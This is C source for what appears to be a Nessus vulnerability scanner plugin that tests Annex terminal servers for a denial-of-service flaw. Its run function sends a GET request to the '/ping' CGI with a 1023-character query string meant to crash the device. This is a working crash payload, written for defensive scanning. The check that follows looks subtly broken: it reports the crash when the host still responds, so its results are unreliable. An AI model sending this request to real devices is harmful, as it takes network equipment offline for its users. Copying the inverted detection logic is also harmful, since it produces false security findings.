/*
 * 
 * annex_dos
 *
 * This plugin was written by Renaud Deraison and is released
 * under the GPL
 *
 */
#include <includes.h>
#include <nessusraw.h>

#define NAME "Annex"
#define DESC "It is possible to crash an Annex terminal server by sending \
a too long argument to the 'ping' CGI.\n\
Risk factor : High"
#define COPYRIGHT "found by the Redes2 Security Team"
#define SUMM "crashes an Annex terminal server"


PlugExport int plugin_init(struct arglist *desc);
PlugExport int plugin_init(struct arglist *desc)
{
	plug_set_name(desc, NAME);
	plug_set_description(desc, DESC);
	plug_set_summary(desc, SUMM);
	plug_set_copyright(desc, COPYRIGHT);
	plug_set_category(desc, ACT_DENIAL);
	plug_set_family(desc, "Denial of Service");
	plug_set_dep(desc, "find_service.nes");
	return(0);
}



PlugExport int plugin_run(struct arglist * args);	
PlugExport int plugin_run(struct arglist * args)
{
	int port = (int)plug_get_key(args, "Services/www");
	if(!port)port = 80;
	if(host_get_port_state(args, port)<=0)return(0);
	
	
	if(is_cgi_installed(args, "/ping"))
        {
         char * command, * crap;
         int soc;
	 struct in_addr * addr = plug_get_host_ip(args);
	 int ping = tcp_ping_host(*addr);
         crap = emalloc(1024);
         command = emalloc(2048);
         
         memset(crap, 'a', 1023);
         sprintf(command, "GET /ping?query=%s\n\n\n", crap);
	 efree(&crap);
         
         if((soc = open_sock_tcp(args,port))>0)
          send(soc, command, strlen(command), 0);
         
         sleep(1);
         if(ping)ping = tcp_ping_host(*addr);
	 else ping = (soc = open_sock_tcp(args, port))<0 ? 0:1;
	
         if(ping)
         {
          post_hole(args, port, "It is possible to crash the remote Annex terminal server \
by requesting the item '/ping?query=aaaaa(.....)aaaa'.\n\
Solution : contact your vendor for a fix");
          }
	  shutdown(soc, 2);
	  close(soc);
          efree(&command);
         }
         
        return(0);
}

